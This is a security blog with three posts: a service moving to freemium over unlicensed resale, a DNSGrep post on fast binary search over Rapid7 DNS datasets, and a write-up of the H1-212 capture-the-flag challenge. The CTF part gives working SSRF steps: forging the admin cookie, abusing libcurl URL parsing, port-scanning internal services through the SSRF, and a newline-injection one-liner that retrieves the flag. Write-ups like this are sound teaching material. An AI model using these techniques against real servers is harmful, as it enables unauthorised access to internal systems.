Why I broke your subdomain recon pipeline last night

(or why tls.bufferover.run is moving from free to free*)


I’m moving https://tls.bufferover.run/ to a freemium model as I’ve identified numerous businesses profiting off of my non-commercial free service.


Over the past few years I have been running a couple of services hosting DNS data sources which have been widely shared and used:

  1. http://dns.bufferover.run/dns?q=.example.com

Rapid7 publishes DNS data for public use here: https://opendata.rapid7.com/ (note the license restrictions). I index this monthly when a new public dataset is published and host it to allow for easy lookups. Without this online tool, 1 second lookups can take 10+ minutes to grep over the entire dataset. I wrote about this in more detail here: https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/

  1. http://tls.bufferover.run/dns?q=.example.com

I created a system to quickly scan all of IPv4 space for TLS certificates and index the DNS values found in the CN and SAN fields. I gave a talk on this at DEFCON 27 PHV: https://www.youtube.com/watch?v=1pqCqz3JzXE (slides)

These two endpoints are very widely used as shown on the graph below:

(this is roughly 20 requests per second over a 30 day period)

Commercial Use

I host both of these endpoints to give back to the security community that I have benefited so much from. On https://tls.bufferover.run I made a simple Terms of Service (TOS) returned with every response:

"TOS": "Use of this data available on this website is subject to the following terms. By accessing or using this data, you accept these terms of service. The data may not be used: 1) To do anything illegal or in violation of the rights of others, including unlawful access or damage to computers. 2) To facilitate or encourage illegal activity. 3) To be resold or repackaged for any commercial offering.",

Over the past few months I have been alerted to multiple companies reselling access to both of these endpoints or otherwise ignoring license restrictions.

For example, on one website selling a subdomain discovery service linked to other tools:

(the *.bufferover.run endpoints above are pulled in via 3 of the “passive” subdomain finding tools listed)

What should I do?

I’m left with a choice for https://tls.bufferover.run as I own this data and run the service:

  1. Ignore that others profit from reselling my free work
  2. Pursue legal action
  3. Take the service offline
  4. Create a paid service

I don’t want to take the service offline. I can’t easily pursue legal action (cost-prohibitive and jurisdiction issues). I could continue ignoring this problem but it is getting increasingly annoying with every cloud bill I receive and every new “subdomain discovery” reseller I see advertised online. That leaves option #4.

Option #4

In order to meet my original goal of giving back to the security community, I am leaving a free endpoint hosted with old data (will vary in age, approximately 90 days… this is still very useful for subdomain discovery). For commercial use and access to the latest scan, I’m going to start charging to:

  1. Recoup service costs
  2. Allow commercial use (which is clearly happening already)

Checkout the options for data access here:

Epilogue — Who in the industry is handling DNS dataset licenses correctly?

To date, only 2 companies have reached out to me with licensing questions:

  1. https://www.intrigue.io/
  2. https://securitytrails.com/

DNSGrep — Quickly Searching Large DNS Datasets

The Rapid7 Project Sonar datasets are amazing resources. They represent scans across the internet, compressed and easy to download. This blog post will focus on two of these datasets:

https://opendata.rapid7.com/sonar.rdns_v2/ (rdns)
https://opendata.rapid7.com/sonar.fdns_v2/ (fdns_a)

Unfortunately, working with these datasets can be a bit slow as the rdns and fdns_a datasets each contain over 10GB of compressed text. My old workflow for using these datasets was not efficient:

ubuntu@client:~$ time gunzip -c fdns_a.json.gz | grep "erbbysam.com"
real 11m31.393s
user 12m29.212s
sys 1m37.672s

I suspected there had to be a faster way of searching these two datasets.

(TLDR, reverse and sort domains then binary search)

DNS Structure

A defining features of the DNS system is its tree-like structure. Visiting this page, you are three levels below the root domain:


The grep query above looks for a domain name tied to the root domain, not an arbitrary string in the file. If we could shape our dataset into a DNS tree, an equivalent lookup would just require a quick traversal of this tree.

Binary Search

The task of transforming a large dataset into a tree on disk and traversing this tree can be simplified further using a binary search algorithm.

The first step in using a binary search algorithm is to sort the data. One option, matching for format above, is the form “com.erbbysam.blog”. This would require a slightly more complex DNS reversal algorithm than neccessary. To simplify, reverse each line instead:


There are no one-command solutions to sort a dataset that does not fit into memory (that I am aware of). To sort these large files, split the data into sorted chunks and then merge the results together:

# fetch the fdns_a file
wget -O fdns_a.gz https://opendata.rapid7.com/sonar.fdns_v2/2019-01-25-1548417890-fdns_a.json.gz

# extract and format our data
gunzip -c fdns_a.gz | jq -r '.value + ","+ .name' | tr '[:upper:]' '[:lower:]' | rev > fdns_a.rev.lowercase.txt

# split the data into chunks to sort
# via https://unix.stackexchange.com/a/350068 -- split and merge code
split -b100M fdns_a.rev.lowercase.txt fileChunk

# remove the old files
rm fdns_a.gz
rm fdns_a.rev.lowercase.txt

# Sort each of the pieces and delete the unsorted one
# via https://unix.stackexchange.com/a/35472 -- use LC_COLLATE=C to sort ., chars
for f in fileChunk*; do LC_COLLATE=C sort "$f" > "$f".sorted && rm "$f"; done

# merge the sorted files with local tmp directory
mkdir -p sorttmp
LC_COLLATE=C sort -T sorttmp/ -muo fdns_a.sort.txt fileChunk*.sorted

# clean up
rm fileChunk*

More detailed instructions for running this script and the rdns equivalent can be found here:


Now we can search the data! To accomplish this, I built a simple golang utility that can be found here:

ubuntu@client:~$ ls -lath fdns_a.sort.txt
-rw-rw-r-- 1 ubuntu ubuntu 68G Feb  3 09:11 fdns_a.sort.txt
ubuntu@client:~$ time ./dnsgrep -f fdns_a.sort.txt -i "erbbysam.com",erbbysam.com,blog.erbbysam.com

real    0m0.002s
user    0m0.000s
sys    0m0.000s

That is significantly faster!

The algorithm is pretty simple:

  1. Use a binary search algorithm to seek through the file, looking for a substring match against the query.
  2. Once a match is found, the file is scanned backwards in 10KB increments looking for a non-matching substring.
  3. Once a non-matching substring is found, the file is scanned forwards until all exact matches are returned.


PoC disclaimer: There is no uptime/performance guarantee of this service and I likely will take this offline at some point in the future. Keep in mind that the datasets here are from a scan on 1/25/19 — DNS records may have changed by the time you read this.

As these queries are so quick, I set up an AWS EC2 t2.micro instance with a spinning disk (Cold HDD sc1) and hosted a server that allows queries into these datasets:


ubuntu@client:~$ curl 'https://dns.bufferover.run/dns?q=erbbysam.com' 
	"Meta": {
		"Runtime": "0.000361 seconds",
		"Errors": [
			"rdns error: failed to find exact match via binary search"
		"FileNames": [
		"TOS": "The source of this data is Rapid7 Labs. Please review the Terms of Service: https://opendata.rapid7.com/about/"
	"FDNS_A": [
	"RDNS": null

Having a bit of fun with this, I queried every North Korean domain name, grepping for the IPs not in North Korean IP space:

 ubuntu@client:~$ curl 'https://dns.bufferover.run/dns?q=.kp' 2> /dev/null | grep -v "\"175\.45\.17"
	"Meta": {
		"Runtime": "0.000534 seconds",
		"Errors": null,
		"FileNames": [
		"TOS": "The source of this data is Rapid7 Labs. Please review the Terms of Service: https://opendata.rapid7.com/about/"
	"FDNS_A": [
	"RDNS": [

That’s it! Hopefully this was useful! Give it a try: https://dns.bufferover.run/dns?q=<hostname>

H1-212 CTF

As with most problems in the world, this one started with a tweet:

Let’s find that flag!


# step 0
curl -v
# step 1 
curl -v -H 'Host: admin.acme.org'
# step 2
curl -v -H 'Host: admin.acme.org' --cookie 'admin=yes'
# step 3
curl -v -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST
# step 4
curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{}'
# step 5
curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:22 @212.example.com"}'
curl -s ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
#step 6 
curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337 @212.example.com"}'
curl -s ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 7
curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/flag\n212.example.com"}'
curl -s ID - 1) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 7, output
FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6

Or if you would prefer a tweet sized solution:

H="Host: admin.acme.org";B="admin=yes";curl$(expr $(curl -s -H "$H" -b "$B" -d '{"domain":"0:1337/flag\n212.h.com"}' -H "Content-Type: application/json"|sed 's/.*=\(.*\)\"}/\1/') - 1) -s -H "$H" -b "$B"|jq -r '.data'|base64 -d

But I digress. Still here? Cool, lets find this flag and document the snags I hit along the way.

Step 1 — Virtual hosting greets us with a default Ubuntu install:


This is the last time we will use our web browser for this CTF (curl time!)!

From the originally tweet & blog post — we know to search for an “admin” interface on We should check for “admin” hostnames for sites hosted (and paths, see setback 1 below) on the same server. This technique of hosting multiple sites behind the same IP/port is called name-based virtual hosting.

Checking any hostname returns the Apache2 Ubuntu default page, with the exception of admin.acme.org:

ubuntu@client:~$ curl -v -H 'Host: admin.acme.org'
*   Trying
* Connected to ( port 80 (#0)
> GET / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
< HTTP/1.1 200 OK
< Date: Fri, 17 Nov 2017 23:30:19 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: admin=no
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8

For admin.acme.org we are provided a blank page and a cookie “admin=no”!

Setback 1.a — Brute force

Executing a brute force scan of the root directory returns nothing exciting, except a fake flag

DNS or other related recon methods will not work as the public acme.org is not associated with this machine.

Step 2 — admin=yes

If we try a few values for the admin cookie, we find the only value that returns anything other than a HTTP 200 return code is “admin=yes”:

ubuntu@client:~$ curl -v -H 'Host: admin.acme.org' --cookie 'admin=yes'
*   Trying
* Connected to ( port 80 (#0)
> GET / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> Cookie: admin=yes
< HTTP/1.1 405 Method Not Allowed
< Date: Sat, 18 Nov 2017 00:25:51 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8

At this point, we have a server returning a 405, which is not terribly exciting. At least there were no setbacks with this step 🙂

Step 3 — What is a 405?

A HTTP 405 response is defined as:

The 405 (Method Not Allowed) status code indicates that the method
received in the request-line is known by the origin server but not
supported by the target resource. The origin server MUST generate an
Allow header field in a 405 response containing a list of the target
resource’s currently supported methods.

An HTTP Method refers to the verb sent by the client, in the above case this was “GET”, however there are many options available. The only method that returns anything different is POST, which can be observed returning a 406 error:

ubuntu@client:~$ curl -v -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST
*   Trying
* Connected to ( port 80 (#0)
> POST / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> Cookie: admin=yes
< HTTP/1.1 406 Not Acceptable
< Date: Sat, 18 Nov 2017 00:37:46 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8


An OPTIONS method with a * request target returns an list of allowed methods:

ubuntu@client:~$ curl -v* -H 'Host: admin.acme.org' --cookie 'admin=yes' -X OPTIONS 2>&1 | grep Allow

Setback 3.a — 405 vs 406

I spent hours trying other HTTP methods as I did not notice that the POST request type returned a 406.

Step 4 — What is a 406?

Noticing a theme here yet? 🙂

A HTTP 406 response is defined as:

The 406 (Not Acceptable) status code indicates that the target
resource does not have a current representation that would be
acceptable to the user agent, according to the proactive negotiation
header fields received in the request (Section 5.3), and the server
is unwilling to supply a default representation.

A 406 typically refers to the Accept headers sent by a client (see setback 4.a). In our case, since we are sending a POST request which generally contains data, the server is complaining that our data is not correctly formatted. If we send a request with a content type “application/json”, we receive this response:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json"
{"error":{"body":"unable to decode"}}

By adding some data, we see that we are missing a domain field:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{}'

These errors actually come in as 418 teapot responses 🍵🍵🍵.

Setback 4.a — Accept all the things

As I thought the 406 header indicated something was missing from my “Accept” HTTP header (implying */* was not acceptable), I spent far too long gathering different acceptable Accept media types.

Step 5 — Domains

Sending domain requests allows us to ascertain the rules regarding the domain that must be followed:

  1. The domain must match the regex .*212.*\..*\.com for example 212.h.com and abc212abc.abc.com are both valid
  2. The domain cannot contain the characters: ? & \ % #
  3. The domain is parsed by php libcurl

To put this into practice, let’s send a sample request (which will GET / from 212.erbbysam.com). Note that this is a 2 step process:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"212.erbbysam.com"}'
ubuntu@client:~$ curl -s -H 'Host: admin.acme.org' --cookie 'admin=yes'
{"data":"(base64 data removed)"}

Rule 3 above becomes obvious when the string “localhost:22 @212.example.com” is provided as a domain:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:22 @212.example.com"}'
ubuntu@client:~$ curl -s -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Protocol mismatch.

That string may look familiar as it is very similar to php libcurl issues that were observed in one of the best talks to come out of Vegas this year (besides my own 🙂 ) – https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

Aside — Tornado black hole

Hosting a simple python tornado server at 212.erbbysam.com allowed me to reason about what the server’s code actually looked like by observing the requests coming in:

import tornado.ioloop
import tornado.web

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        print self.request

def make_app():
    return tornado.web.Application([
        (r"/.*", MainHandler),

if __name__ == "__main__":
    app = make_app()

Step 6 — Internal network scan

Suspecting that pivoting to something only accessible locally was the next step (while trying all the things™), I setup a simple Go executable to scan every port accessible (similar to port 22 above):

package main

import "fmt"
import "os/exec"
import "strings"
import "strconv"

func Cmd(cmd string) []byte {
    out, err := exec.Command("bash", "-c", cmd).Output()
    if err != nil {
        fmt.Printf("error -- %s\n", cmd)
    return out

func main() {
    port := 0
    for port < 65535 {
        fmt.Printf("%d -- ", port)
        cmd := fmt.Sprintf("curl http://admin.acme.org/index.php --header 'Host: admin.acme.org' --cookie 'admin=yes' -v -X POST -d '{\"domain\":\"localhost:%d @212.example.com\"}' -H 'Content-Type: application/json' --max-time 10 ", port)
        out := string(Cmd(cmd))
        out =  strings.TrimLeft(strings.TrimRight(out,"\"}"),"{\"next\":\"\\/read.php?id=")
        num_out, err := strconv.Atoi(out)

        if err == nil {
            cmd = fmt.Sprintf("curl --header 'Host: admin.acme.org' --cookie \"admin=yes\" -v --max-time 10 " ,num_out)
            out = string(Cmd(cmd))

        } else {
        port = port + 1

Running this code only produced a few interesting hits:

ubuntu@client:~/go/scan$ go run test.go
22 -- {"data":"U1NILTIuMC1PcGVuU1NIXzcuMnAyIFVidW50dS00dWJ1bnR1Mi4yDQpQcm90b2NvbCBtaXNtYXRjaC4K"} (SSH example above)
53 -- error (local dns server)
80 -- {"data":"CjwhRE9DVFlQRSBodG1sIFBVQkxJQ... (default ubuntu page)
1337 -- {"data":"SG1tLCB3aGVyZSB3b3VsZCBpdCBiZT8K"} ("Hmm, where would it be?")

The 1337 port appears to be running an http server (and it’s hinting that we’re getting close)!

Step 7 — Reaching /flag on 1337

This part is a bit tricky. An intentional “bug” in the domain parsing script meant that a \n character would split a request into 2 separate reads (incrementing the read.php ID 2x). To demonstrate this, I will make two consecutive calls with a \n:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:80/\n212.h.com"}'
ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/\n212.example.com"}'

In this case read.php?id=2140 will access “localhost:1337/” while read.php?id=2141 will access “212.example.com”. This allows us to access localhost:1337/flag and grab our flag while still satisfying the domain rules from step 5!

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/flag\n212.example.com"}'
ubuntu@client:~$ curl -s -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6

Setback 7.a — Unicode characters

Using the python tornado server above, I observed that any unicode character (as \uXXXX where X is a hex character) could be passed through the server (with the exception of the character list in part 5). This is due to the use of json encoding, but was entirely unused here.

Setback 7.b — \n

I could not figure out why my request would disappear when a \n was passed in (no error appeared and no domain was contacted). My breakthrough here came when I tried the domain “212.erbbysam.com:80/flag\n212.erbbysam.com” and a GET / was accessed by the ID that was returned, I then noticed the ID had incremented twice (1st ID would GET /flag, 2nd ID — the value returned — would get /).


In conclusion, never stop trying all the things™ and always be on the lookout for interesting papers and presentations (I’m not sure if I would have finished this without knowing about that Black Hat URL parser presentation).

Taking the curl requests from step 7, creating a few temporary bash variables and changing “localhost” to “0” we reduce this CTF to proper tweet form (277 characters):

H="Host: admin.acme.org";B="admin=yes";curl$(expr $(curl -s -H "$H" -b "$B" -d '{"domain":"0:1337/flag\n212.h.com"}' -H "Content-Type: application/json"|sed 's/.*=\(.*\)\"}/\1/') - 1) -s -H "$H" -b "$B"|jq -r '.data'|base64 -d

Huge shout-out to @NahamSec and @jobertama for this awesome challenge & thanks for reading 🙂